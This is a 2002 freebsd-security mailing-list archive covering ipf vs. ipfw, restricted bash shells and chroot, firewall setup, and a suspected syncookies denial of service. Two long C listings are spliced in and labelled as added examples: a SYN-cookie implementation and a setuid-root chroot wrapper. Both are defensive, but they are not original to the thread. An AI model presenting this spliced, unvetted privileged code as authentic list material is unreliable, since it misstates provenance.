Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g48FuZEN084027; Wed, 8 May 2002 11:56:35 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g48FuY0q084024; Wed, 8 May 2002 11:56:34 -0400 (EDT)
Date: Wed, 8 May 2002 11:56:34 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200205081556.g48FuY0q084024@khavrinen.lcs.mit.edu>
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG
Subject: Re: ipf vs. ipfw
In-Reply-To: <200205080916.g489GDec019355@cairo.anu.edu.au>
References: <20020507231529.8B55C2744@tesla.foo.is> <200205080916.g489GDec019355@cairo.anu.edu.au>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

< said:

> ipfw does share its roots with the linux ipfw but linux long ago dropped
> its one and the freebsd one is now much different.

It is possible that the old Lignux `ipfw' was based on FreeBSD's; not
the other way around.

-GAWollman

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 9:24: 3 2002
Delivered-To: freebsd-security@freebsd.org
Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id AEA9637B40A for ; Wed, 8 May 2002 09:23:47 -0700 (PDT)
Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g48GNkl89410 for ; Wed, 8 May 2002 11:23:47 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu)
Message-Id: <200205081623.g48GNkl89410@dc.cis.okstate.edu>
Reply-To: martin@dc.cis.okstate.edu
To: freebsd-security@FreeBSD.ORG
Subject: Accounts with Restricted privileges
Date: Wed, 08 May 2002 11:23:46 -0500
From: Martin McCormick
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Is it possible to create an account with a restricted
shell?

The documentation for bash shows that it can be invoked
with the --restricted flag. A check of the handbook shows
nothing more about this topic. Neither did a look at the man
pages for login.

Thank you.

Martin McCormick WB5AGZ Stillwater, OK
OSU Center for Computing and Information Services Network Operations Group

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed May 8 9:31:45 2002
Delivered-To: freebsd-security@freebsd.org
Received: from webterminator19.crystaltech.com (mail1.crystaltech.com [216.119.106.20]) by hub.freebsd.org (Postfix) with ESMTP id 0792837B40A for ; Wed, 8 May 2002 09:31:31 -0700 (PDT)
Received: from romy [166.84.146.186] by webterminator19.crystaltech.com (SMTPD32-7.06) id A2DC20B0034; Wed, 08 May 2002 09:31:24 -0700
Message-ID: <004801c1f6ad$cbca1c40$ba9254a6@romy>
Reply-To: "Justin King"
From: "Justin King"
To:
References: <200205081623.g48GNkl89410@dc.cis.okstate.edu>
Subject: Re: Accounts with Restricted privileges
Date: Wed, 8 May 2002 12:31:24 -0400
Organization: Othius.com
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

man bash

RESTRICTED SHELL
    If bash is started with the name rbash, or the -r option is
    supplied at invocation, the shell becomes restricted. A
    restricted shell is used to set up an environment more
    controlled than the standard shell. It behaves identically
    to bash with the exception that the following are disallowed
    or not performed:

    o  changing directories with cd

    o  setting or unsetting the values of SHELL, PATH, ENV, or
       BASH_ENV

    o  specifying command names containing /

    o  specifying a file name containing a / as an argument to
       the . builtin command

    o  Specifying a filename containing a slash as an argument to
       the -p option to the hash builtin command

    o  importing function definitions from the shell environment
       at startup

    o  parsing the value of SHELLOPTS from the shell environment
       at startup

    o  redirecting output using the >, >|, <>, >&, &>, and >>
       redirection operators

    o  using the exec builtin command to replace the shell with
       another command

    o  adding or deleting builtin commands with the -f and -d
       options to the enable builtin command

    o  specifying the -p option to the command builtin command

    o  turning off restricted mode with set +r or set +o
       restricted.

----- Original Message -----
From: "Martin McCormick" To: Sent: Wednesday, May 08, 2002 12:23 PM Subject: Accounts with Restricted privileges > Is it possible to create an account with a restricted > shell? > > The documentation for bash shows that it can be invoked > with the --restricted flag. A check of the handbook shows > nothing more about this topic. Neither did a look at the man > pages for login. > > Thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 10:18:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from exgw2.lumeta.com (exgw2.lumeta.com [65.198.68.66]) by hub.freebsd.org (Postfix) with ESMTP id 5823237B409; Wed, 8 May 2002 10:18:22 -0700 (PDT) Received: from lucy.corp.lumeta.com (h65-198-68-133.lumeta.com [65.198.68.133]) by exgw2.lumeta.com (Postfix) with ESMTP id 89157373835; Wed, 8 May 2002 13:18:17 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 7E78C10842; Wed, 8 May 2002 13:18:16 -0400 (EDT) Received: from lumeta.com (tal.corp.lumeta.com [65.198.68.200]) by lucy.corp.lumeta.com (Postfix) with ESMTP id A10E010841; Wed, 8 May 2002 13:18:07 -0400 (EDT) Message-ID: <3CD95E0F.A3E7398C@lumeta.com> Date: Wed, 08 May 2002 13:19:11 -0400 
From: Tom Limoncelli Organization: Lumeta Corp X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG Cc: Darren Reed Subject: Re: ipf vs. ipfw References: <200205080916.g489GDec019355@cairo.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to everyone that answered my questions. As in true Usenet tradition, if you want the full story, post a message with a lot of incorrect statements. I got much better results than the carefully thought out queries that I had sent to various people. :-) I've updated my page http://whatexit.org/tal/mywritings/freefilters.html --Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:27:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from anchor-post-35.mail.demon.net (anchor-post-35.mail.demon.net [194.217.242.93]) by hub.freebsd.org (Postfix) with ESMTP id 3F97637B405 for ; Wed, 8 May 2002 11:27:50 -0700 (PDT) Received: from caomhin.demon.co.uk ([212.228.234.119]) by anchor-post-35.mail.demon.net with esmtp (Exim 3.35 #1) id 175WAE-0007Q4-0Z; Wed, 08 May 2002 19:27:48 +0100 Message-ID: Date: Wed, 8 May 2002 19:11:55 +0100 To: martin@dc.cis.okstate.edu Cc: freebsd-security@FreeBSD.ORG 
From: Kevin Golding Subject: Re: Accounts with Restricted privileges References: <200205081623.g48GNkl89410@dc.cis.okstate.edu> In-Reply-To: <200205081623.g48GNkl89410@dc.cis.okstate.edu> MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 U Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Someone, quite probably Martin McCormick, once wrote: > Is it possible to create an account with a restricted >shell? > > The documentation for bash shows that it can be invoked >with the --restricted flag. A check of the handbook shows >nothing more about this topic. Neither did a look at the man >pages for login. Copy the bash binary and call it rbash then set the users shell to rbash and when they login they'll be in a restricted shell. Kevin -- kevin@caomhin.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:29:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id 808F537B40A for ; Wed, 8 May 2002 11:29:04 -0700 (PDT) Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g48IT3l42844 for ; Wed, 8 May 2002 13:29:03 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu) Message-Id: <200205081829.g48IT3l42844@dc.cis.okstate.edu> To: freebsd-security@FreeBSD.ORG Subject: Re: Accounts with Restricted privileges Date: Wed, 08 May 2002 13:29:03 -0500 
From: Martin McCormick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you. I missed rbash when I read the bash manual page. It now works great. All one has to do is link rbash to bash and it all works as advertised. "Justin King" writes: >man bash > >RESTRICTED SHELL > If bash is started with the name rbash, or the -r option To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:46:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578012pcs.martnz01.ga.comcast.net [68.47.4.97]) by hub.freebsd.org (Postfix) with ESMTP id 0CE6A37B40C for ; Wed, 8 May 2002 11:46:13 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g48IkCi00609 for ; Wed, 8 May 2002 14:46:12 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CD97274.4B62D938@vortex.wa4phy.net> Date: Wed, 08 May 2002 14:46:12 -0400 
From: Sam Drinkard
Organization: You Gotta Be Kiddin!
To: freebsd-security@freebsd.org
Subject: Stock rc.firewall

Hello all,

I may be trying too hard to close stuff off, but I've read so much that I'm pretty confused now, and would appreciate some pointers, or examples.

Situation: In setting up the "simple" mode firewall, I find that works quite well -- too well in fact, that it also kills all connectivity to the internal windoze box via samba. Can't ping it nor can it ping the bsd machine. I added a rule, "add pass ip from 192.168.100.5 to any via any", which permits tcp to function, but again, samba is dead because of the port 137 blocking. The services I currently need are the ntalkd, and pop3 ports as defined by inetd.conf, port 80, and the other "normal" services ports, i.e., ntp, dns, ssh, etc. I have tried several different ideas, but every time, something breaks something else, and the things I've been reading don't really help much, including the docs on security, ipfw, and web-docs.

I'd sure appreciate it if someone could lend a hand here.. and if it will help, here's the basic configuration. FreeBSD connected to cable, feeding a single windoze machine at 192.168.100.5. So it's a pretty simple network at this point. My linux machine is currently off-line because of a hardware problem, but is also a 192.168 address. If I use the "open" version of the rc.firewall, of course, everything works just great with natd, but that's got to change.

TIA...
Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 12:13:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 8693D37B404 for ; Wed, 8 May 2002 12:13:46 -0700 (PDT) Received: (qmail 29798 invoked by uid 1001); 8 May 2002 19:13:40 -0000 Message-ID: <20020508191340.29797.qmail@d188h80.mcb.uconn.edu> References: <20020507235944.S8475-100000@utility.clubscholarship.com> In-Reply-To: <20020507235944.S8475-100000@utility.clubscholarship.com> 
From: "Peter C. Lai"
To: Patrick Thomas
Cc: freebsd-security@freebsd.org
Subject: Re: what does a syncookies attack look like ?
Date: Wed, 08 May 2002 19:13:40 GMT

I have also seen this happen on a box that has run out of swap, or is unable to swap out (which is effectively the same result, but the second could be due to hardware failure). You say that you can no longer connect to the box remotely when the box goes down. Are you patched for the tcpip routing table memory leak? Remember that vulnerability required you to go to patchlevel 4.5-RELEASE-p3 (or -STABLE after the fix). More info on this vuln can be found here:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:21.tcpip.asc

Patrick Thomas writes:

>
> thank you - however based on my description of the crash (kernel seems to
> be running, userland is not) people here seem to feel it is not a
> syncookies attack. They seem to think a syncookies attack would be a much
> harder crash/lock.
>
> This last email of mine was simply describing why I think it is an attack
> in general - just not sure yet what kind.
>
> Do you have other information that leads you to believe a syncookies
> attack could indeed lead to the kind of strange lockup I am describing ?
>
> thanks.
>
>
>
> On Wed, 8 May 2002, Greg Panula wrote:
>
>> Patrick Thomas wrote:
>> >
>> > The reason we suspect it is an attack - or at least an outside influence -
>> > is that the crash/hang occurs at exactly the same time every day. Of
>> > course the first reaction to that would be "probably a cron job" ...
>> > however we have ruled that out by setting the system time to the time that
>> > it crashes .. at times of the day with analogous (or greater) load than
>> > when it really does crash. When we artificially set the time to the "zero
>> > hour" nothing happens.
>> >
>> > However, when that time comes up in the "real world", the server hangs
>> > like I described.
>> .
>> .
>> .
>> > tcpdump on the machine itself and on the firewall reveals nothing
>> > interesting. Not an interesting level of traffic in terms of transactions
>> > or bandwidth. We're going crazy here trying to figure it out. We are
>> > running the very first 4.5-RELEASE, and we have so far only patched the
>> > included sshd, and done the chmod on the `keylink` file or whatever it was
>> > that was suid root. Otherwise it is a stock very first release of
>> > 4.5-RELEASE.
>> >
>> > thanks for any suggestions/help,
>> >
>>
>> The answer to your problem is probably related to security advisory:
>> FreeBSD-SA-02:20 "syncache/syncookies denial of service"
>>
>> The full text of the advisory can be found at:
>> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc
>>
>> All of the security advisories can be found at:
>> http://www.freebsd.org/security/index.html#adv
>>
>>
>> A google search for 'syncookies' or 'synflooding' should turn up some useful
>> information about SYN flooding and the use of syncookies as a defense.
>>
>> I found a quick description at:
>> http://www.incidents.org/diary/november01/110801.php
>>
>> "On some operating systems it is possible to configure the
>> kernel to use a SYN flood protection mechanism known as
>> SYNcookies. The idea is that, if the server should detect
>> a SYN flood attack, it can stop keeping state on waiting-to-be-
>> completed three way handshakes, and switch to a challenge-response
>> mechanism for accepting new connections.
>>
>> When in "flood protection mode" the server embeds a cryptographically
>> strong "cookie" in the TCP header of each SYN-ACK it sends. This
>> cookie is a state-keeping mechanism. If a real client is actually
>> engaged on the other end of the connection, the client will
>> automatically return the cookie to the server when responding
>> with the final ACK of the three-way-handshake. Thus, the server
>> can completely forget about the connection after sending the
>> SYN-ACK, because all the state data required to establish the
>> new connection arrives in the final ACK. "
>>
>> Good luck,
>> Greg
>>

-----------
Peter C. Lai
University of Connecticut
Dept. of Molecular and Cell Biology | Undergraduate Research Assistant
http://cowbert.2y.net/

From owner-freebsd-security Wed May 8 13:54:31 2002
Date: Wed, 08 May 2002 13:47:58 -0700 (PDT)
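The stateless handshake described in the quoted incidents.org text, as an added example (not FreeBSD's syncookie code and not code from anyone in this thread). It uses the layout D. J. Bernstein described (5-bit time counter, 3-bit MSS index, 24-bit keyed hash) with SipHash-2-4 as the keyed hash; the key, addresses, MSS table and the inclusion of the client's sequence number in the hash are assumptions made for the illustration.

```c
/* Added example: stateless SYN cookie encode/verify. Not FreeBSD's implementation. */
#include <stdint.h>
#include <stdio.h>

#define ROTL64(x, b) (((x) << (b)) | ((x) >> (64 - (b))))
#define SIPROUND(v) do {                                                          \
    v[0] += v[1]; v[1] = ROTL64(v[1], 13); v[1] ^= v[0]; v[0] = ROTL64(v[0], 32); \
    v[2] += v[3]; v[3] = ROTL64(v[3], 16); v[3] ^= v[2];                          \
    v[0] += v[3]; v[3] = ROTL64(v[3], 21); v[3] ^= v[0];                          \
    v[2] += v[1]; v[1] = ROTL64(v[1], 17); v[1] ^= v[2]; v[2] = ROTL64(v[2], 32); \
} while (0)

/* Everything the server can read again from the final ACK segment. */
struct flow { uint32_t saddr, daddr; uint16_t sport, dport; uint32_t client_isn; };

/* Constructed sample values (documentation address ranges, arbitrary key). */
static const uint64_t demo_key[2] = { 0x0706050403020100ULL, 0x0f0e0d0c0b0a0908ULL };
static const struct flow demo_flow    = { 0xc0000201u, 0xc6336407u, 40000, 80, 0x1000 };
static const struct flow spoofed_flow = { 0xc0000263u, 0xc6336407u, 40000, 80, 0x1000 };

/* Constructed table: 3 bits in the cookie select one of these MSS values. */
static const uint16_t mss_table[8] = { 216, 536, 768, 996, 1220, 1340, 1440, 1460 };

/* SipHash-2-4 over n 64-bit words (equivalent to hashing their little-endian bytes). */
static uint64_t siphash24_words(const uint64_t key[2], const uint64_t *w, int n)
{
    uint64_t v[4] = { key[0] ^ 0x736f6d6570736575ULL, key[1] ^ 0x646f72616e646f6dULL,
                      key[0] ^ 0x6c7967656e657261ULL, key[1] ^ 0x7465646279746573ULL };
    uint64_t last = (uint64_t)(8 * n) << 56;   /* final block: length byte only */
    for (int i = 0; i < n; i++) { v[3] ^= w[i]; SIPROUND(v); SIPROUND(v); v[0] ^= w[i]; }
    v[3] ^= last; SIPROUND(v); SIPROUND(v); v[0] ^= last;
    v[2] ^= 0xff;
    for (int i = 0; i < 4; i++) SIPROUND(v);
    return v[0] ^ v[1] ^ v[2] ^ v[3];
}

/* 24-bit MAC binding the cookie to the 4-tuple, client ISN, time slot and MSS index. */
static uint32_t cookie_mac(const uint64_t key[2], const struct flow *f, uint32_t t, uint32_t m)
{
    uint64_t w[3] = { ((uint64_t)f->saddr << 32) | f->daddr,
                      ((uint64_t)f->sport << 48) | ((uint64_t)f->dport << 32) | f->client_isn,
                      ((uint64_t)t << 8) | m };
    return (uint32_t)(siphash24_words(key, w, 3) & 0xffffff);
}

/* Sequence number for the SYN-ACK. The server stores nothing after sending it. */
uint32_t syncookie_make(const uint64_t key[2], const struct flow *f, uint32_t now, uint16_t mss)
{
    uint32_t t = (now / 64) & 31;              /* time slot, 64 s granularity */
    uint32_t m = 7;
    while (m > 0 && mss_table[m] > mss)        /* largest table entry <= client MSS */
        m--;
    return (t << 27) | (m << 24) | cookie_mac(key, f, t, m);
}

/* Final ACK: ack = cookie + 1. Returns the negotiated MSS, or 0 to drop the segment. */
int syncookie_check(const uint64_t key[2], const struct flow *f, uint32_t now, uint32_t ack)
{
    uint32_t cookie = ack - 1;
    uint32_t t = cookie >> 27, m = (cookie >> 24) & 7;
    uint32_t cur = (now / 64) & 31;
    if (t != cur && t != ((cur - 1) & 31))
        return 0;                              /* too old */
    if ((cookie & 0xffffff) != cookie_mac(key, f, t, m))
        return 0;                              /* forged, or for another flow */
    return mss_table[m];
}

int main(void)
{
    uint32_t c = syncookie_make(demo_key, &demo_flow, 6400, 1400);
    printf("SYN-ACK seq (cookie): 0x%08x\n", (unsigned)c);
    printf("valid ACK     -> MSS %d\n", syncookie_check(demo_key, &demo_flow, 6410, c + 1));
    printf("altered ACK   -> %d\n", syncookie_check(demo_key, &demo_flow, 6410, (c ^ 1u) + 1));
    printf("other source  -> %d\n", syncookie_check(demo_key, &spoofed_flow, 6410, c + 1));
    printf("late ACK      -> %d\n", syncookie_check(demo_key, &demo_flow, 6400 + 192, c + 1));
    return 0;
}
```

Because only the time slot modulo 32 is carried, a cookie from this example becomes acceptable again 2048 seconds later unless the key is rotated in the meantime.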
From: Mark Hartley
To: freebsd-security@freebsd.org
Subject: support for RELENG_4_4

I have a question regarding the -SECURITY branch (I know that's not its real name) for 4.4. It has been stated (and I found this out only recently) that the only branches supported for security patches would be the current one and the previous one, which currently means RELENG_4_4 and RELENG_4_5. I'm assuming that after 4.6 gets released, that security fixes will no longer be (always) applied to the 4_4 branch. Is this correct information?

I was bit by this, because I had several servers using the 4_3 branch, and I didn't realize for quite a while that all of the fixes were not being applied there (this was after 4.5 came out).

I don't know about many others, but I can't simply throw the newest version on my servers whenever it comes out. I wait for several months before upgrading, just to make sure there aren't any "gotchas" that weren't found during the release engineering process. The problem with waiting is that before the time I feel I can move up, the branch I've been following has stopped receiving all of the security fixes.

I have a bunch of servers tracking 4_4 and I'm not ready to move them off of that yet. I probably won't be moving them to track RELENG_4_5 until at least mid summer.

So my question is two-fold:

1. Is the 4_4 branch about to lose its status as a "receives all security fixes" branch?

2. Can an email be sent to -security (or wherever deemed appropriate) if/when that happens so that people like me can know about it?

I understand why only the newest branches get all of the security fixes, due to the difficulty in porting to older versions of apps, so I'm not griping about the policy (since I'm not enough of a C coder to make patches for the older versions).
I'm just wanting to know if the policy can be made more public so folks like me can know when we have to either upgrade or live on our own. Mark. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 13:54:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 8D33337C14B for ; Wed, 8 May 2002 13:48:13 -0700 (PDT) Received: (qmail 2393 invoked from network); 8 May 2002 20:48:02 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 8 May 2002 20:48:02 -0000 Content-Type: text/plain; charset="us-ascii" 
From: "Dalin S. Owen"
Reply-To: dowen@pstis.com
Organization: Nexus XI Corp.
To: security@freebsd.org
Subject: Re: Accounts with Restricted privileges
Date: Wed, 8 May 2002 14:43:51 -0600
Message-Id: <200205081443.51457.dowen@pstis.com>

On May 8, 2002 10:31 am, Justin King wrote:

Actually.. I am looking for the almost same answer... what about a chroot-ed shell? ie. they can "cd" forwards but not back beyond my designated "/"... and I quote (from bash's manpage):

"When a command that is found to be a shell script is executed (see COMMAND EXECUTION above), rbash turns off any restrictions in the shell spawned to execute the script."

I don't want that. I want all other processes to be chrooted too. By now some of you are thinking "jail"... A jail won't cut it, because you can't use quotas in a jail.

Does anyone know how to do this with bash, or any other shell? I recall someone talking about a shell that could do all of the above.

Thanks! :)

FreeBSD Rox, BTW!

> man bash
>
> RESTRICTED SHELL
> If bash is started with the name rbash, or the -r option
> is supplied at invocation, the shell becomes restricted.
> A restricted shell is used to set up an environment more
> controlled than the standard shell. It behaves identically
> to bash with the exception that the following are
> disallowed or not performed:
>
> o changing directories with cd
>
> o setting or unsetting the values of SHELL, PATH,
>   ENV, or BASH_ENV
>
> o specifying command names containing /
>
> o specifying a file name containing a / as an argument
>   to the . builtin command
>
> o Specifying a filename containing a slash as an
>   argument to the -p option to the hash builtin command
>
> o importing function definitions from the shell
>   environment at startup
>
> o parsing the value of SHELLOPTS from the shell
>   environment at startup
>
> o redirecting output using the >, >|, <>, >&, &>, and
>   >> redirection operators
>
> o using the exec builtin command to replace the shell
>   with another command
>
> o adding or deleting builtin commands with the -f and
>   -d options to the enable builtin command
>
> o specifying the -p option to the command builtin
>   command
>
> o turning off restricted mode with set +r or set +o
>   restricted.
>
>
>
> ----- Original Message -----
> From: "Martin McCormick"
> To:
> Sent: Wednesday, May 08, 2002 12:23 PM
> Subject: Accounts with Restricted privileges
>
> > Is it possible to create an account with a restricted
> > shell?
> >
> > The documentation for bash shows that it can be invoked
> > with the --restricted flag. A check of the handbook shows
> > nothing more about this topic. Neither did a look at the man
> > pages for login.
> >
> > Thank you.

From owner-freebsd-security Wed May 8 14:15:55 2002
Date: Wed, 8 May 2002 17:17:17 -0400
From: Anthony Schneider
To: "Dalin S. Owen"
Cc: security@FreeBSD.ORG
Subject: Re: Accounts with Restricted privileges
Message-ID: <20020508171717.A37592@mail.slc.edu>
References: <200205081443.51457.dowen@pstis.com>
In-Reply-To: <200205081443.51457.dowen@pstis.com>; from dowen@pstis.com on Wed, May 08, 2002 at 02:43:51PM -0600

if you don't have any luck finding a shell with chrootability, you could easily write a simple setuid wrapper to chroot() and then execute rbash, where rbash is located within the chrooted file hierarchy.
-Anthony.

On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote:
> On May 8, 2002 10:31 am, Justin King wrote:
>
> Actually.. I am looking for the almost same answer... what about a chroot-ed
> shell? ie. they can "cd" forwards but not back beyond my designated "/"...
> and I quote (from bash's manpage):
>
> "When a command that is found to be a shell script is executed
> (see COMMAND EXECUTION above), rbash turns off any
> restrictions in the shell spawned to execute the script."
>
> I don't want that. I want all other processes to be chrooted too. By now
> some of you are thinking "jail"... A jail won't cut it, because you can't use
> quotas in a jail.
>
> Does anyone know to do this with bash, or any other shell? I recall someone
> talking about a shell that could do all of the above.
>
> Thanks!:)
>
> FreeBSD Rox, BTW!
>
> > man bash
> >
> > RESTRICTED SHELL
> > If bash is started with the name rbash, or the -r option
> > is supplied at invocation, the shell becomes restricted.
> > A restricted shell is used to set up an environment more
> > controlled than the standard shell. It behaves identically
> > to bash with the exception that the following are
> > disallowed or not performed:
> >
> > o changing directories with cd
> >
> > o setting or unsetting the values of SHELL, PATH,
> >   ENV, or BASH_ENV
> >
> > o specifying command names containing /
> >
> > o specifying a file name containing a / as an argument
> >   to the . builtin command
> >
> > o Specifying a filename containing a slash as an
> >   argument to the -p option to the hash builtin command
> >
> > o importing function definitions from the shell
> >   environment at startup
> >
> > o parsing the value of SHELLOPTS from the shell
> >   environment at startup
> >
> > o redirecting output using the >, >|, <>, >&, &>, and
> >   >> redirection operators
> >
> > o using the exec builtin command to replace the shell
> >   with another command
> >
> > o adding or deleting builtin commands with the -f and
> >   -d options to the enable builtin command
> >
> > o specifying the -p option to the command builtin
> >   command
> >
> > o turning off restricted mode with set +r or set +o
> >   restricted.
> >
> >
> >
> > ----- Original Message -----
> > From: "Martin McCormick"
> > To:
> > Sent: Wednesday, May 08, 2002 12:23 PM
> > Subject: Accounts with Restricted privileges
> >
> > > Is it possible to create an account with a restricted
> > > shell?
> > >
> > > The documentation for bash shows that it can be invoked
> > > with the --restricted flag. A check of the handbook shows
> > > nothing more about this topic. Neither did a look at the man
> > > pages for login.
> > >
> > > Thank you.

-----------------------------------------------
PGP key at:
http://www.keyserver.net/
http://www.anthonydotcom.com/gpgkey/key.txt
Home: http://www.anthonydotcom.com
-----------------------------------------------

From owner-freebsd-security Wed May 8 15:12:39 2002
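An added example, not code posted by anyone in this thread: the setuid-root wrapper suggested in the message above, which enters the chroot, permanently drops root and only then executes the shell. The jail path /home/jail, the in-jail shell path /bin/rbash and the function names are assumptions.

```c
/* Added example: setuid-root login wrapper that confines a user to a chroot.
 * Assumed layout (not from the thread): jail tree at /home/jail, shell at
 * /bin/rbash inside that tree. Install the wrapper root-owned, mode 4755. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE          /* glibc: expose chroot() and setgroups() */
#endif
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define JAIL_DIR   "/home/jail"  /* assumption */
#define JAIL_SHELL "/bin/rbash"  /* path as seen from inside the jail; assumption */

/* Open the jail root and refuse it unless it is a real directory (no symlink)
 * owned by root and not writable by group or others. Checking the opened
 * descriptor instead of the path avoids a check-then-use race. */
int open_jail_root(const char *dir)
{
    struct stat st;
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Enter the jail and permanently become uid/gid. Returns 0 on success and -1
 * on failure; after a failure the caller must exit without running anything. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    int fd, saved;

    /* A process that is still root inside a chroot can leave it again. */
    if (uid == 0 || gid == 0) {
        errno = EINVAL;
        return -1;
    }
    if ((fd = open_jail_root(dir)) < 0)
        return -1;
    /* chdir into the new root before chroot(), then chdir("/") after it, so
     * the working directory never points outside the jail. */
    if (fchdir(fd) != 0 || chroot(".") != 0 || chdir("/") != 0) {
        saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    close(fd);
    /* Order matters: groups and gid first, uid last, while we are still root. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify that the drop cannot be undone. */
    if (setuid(0) == 0 || getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* argv[0] "rbash" makes bash start in restricted mode. */
    char *const argv[] = { "rbash", NULL };
    /* Fixed environment: nothing from the caller reaches the shell. */
    char *const envp[] = { "PATH=/bin", "HOME=/", "SHELL=" JAIL_SHELL, NULL };

    /* In a setuid program getuid()/getgid() are the invoking user's ids. */
    if (enter_jail(JAIL_DIR, getuid(), getgid()) != 0) {
        perror("enter_jail");
        return 1;
    }
    execve(JAIL_SHELL, argv, envp);
    perror("execve");
    return 1;
}
```

Every process the shell starts inherits the chroot, so scripts that lose rbash's restrictions are still confined to the jail tree; the tree needs its own copies of the shell and of any libraries and programs the user may run.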
From: "Dalin S. Owen"
Reply-To: dowen@pstis.com
Organization: Nexus XI Corp.
To: Anthony Schneider
Subject: Re: Accounts with Restricted privileges
Date: Wed, 8 May 2002 16:08:21 -0600
References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu>
